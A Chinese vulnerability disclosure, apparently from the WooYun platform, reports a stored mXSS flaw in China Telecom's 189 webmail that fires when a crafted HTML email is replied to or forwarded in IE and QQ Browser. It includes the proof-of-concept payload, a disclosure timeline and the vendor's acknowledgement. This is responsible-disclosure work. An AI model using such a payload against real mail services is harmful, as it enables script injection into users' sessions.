中国电信189邮箱存储型xss(回复转发触发)

漏洞详情

披露状态:

2014-02-25: 细节已通知厂商并且等待厂商处理中
2014-03-02: 厂商已经确认,细节仅向厂商公开
2014-03-12: 细节向核心白帽子及相关领域专家公开
2014-03-22: 细节向普通白帽子公开
2014-04-01: 细节向实习白帽子公开
2014-04-11: 细节向公众公开

简要描述:

感谢gainover的科普。mxss,影响浏览器,IE系列。测试ie8,ie11均受影响,和QQ浏览器。

详细说明:

189.png





使用支持html的邮箱发送 如下内容的邮件

<listing>&lt;img src=1 onerror=alert(888) &gt;</listing>

回复转发的时候即可触发xss





漏洞证明:

189.png

修复方案:

学习 http://drops.wooyun.org/tips/956

版权声明:转载请注明来源 D&G@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-02 10:34

厂商回复:

已经转由CNCERT直接转报给中国电信集团公司,由其后续联系处置。

最新状态:

暂无


漏洞评价: